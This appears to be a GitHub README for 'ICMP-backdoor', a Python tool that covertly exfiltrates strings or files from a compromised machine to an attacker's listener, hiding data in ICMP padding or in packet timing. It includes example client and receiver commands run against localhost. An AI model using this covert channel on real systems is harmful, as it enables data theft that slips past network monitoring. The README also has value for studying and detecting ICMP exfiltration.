Skip to content

Latest commit

 

History

History
53 lines (37 loc) · 1.23 KB

README.md

File metadata and controls

53 lines (37 loc) · 1.23 KB

ICMP-backdoor

Python-based tool to exfiltrate data through ICMP, supports multiple modes of operation and exfiltration

Usage

The tool consists of two scripts, one to be executed from the compromised machine (client.py) and the other from the attacker's (receiver.py). There are two methods of exfiltration:

  • Data-based: exfils the information on the padding bytes of each ICMP packet.
  • Time-based: the information is transmitted via the frquence of ICMP packets, each of which is a simple packet with no information.

More modes of operation will be researched and added soon.

The data can be transfered in different ways:

  • Strings (-i switch)
  • Files (-f switch)
  • Shell (to be implemented soon)

Example usage

Client

==> python client.py -d 127.0.0.1 -i "Secret message"
[*] Destination of data: 127.0.0.1
[*] Sending encoded message: "Secret message"
[*] Message sent to 127.0.0.1

Server

==> python receiver.py -i lo
[*] Started listener on interface: lo
[*] Listening mode: 1
[*] Buf length   : 64
[*] Received data: "Secret message"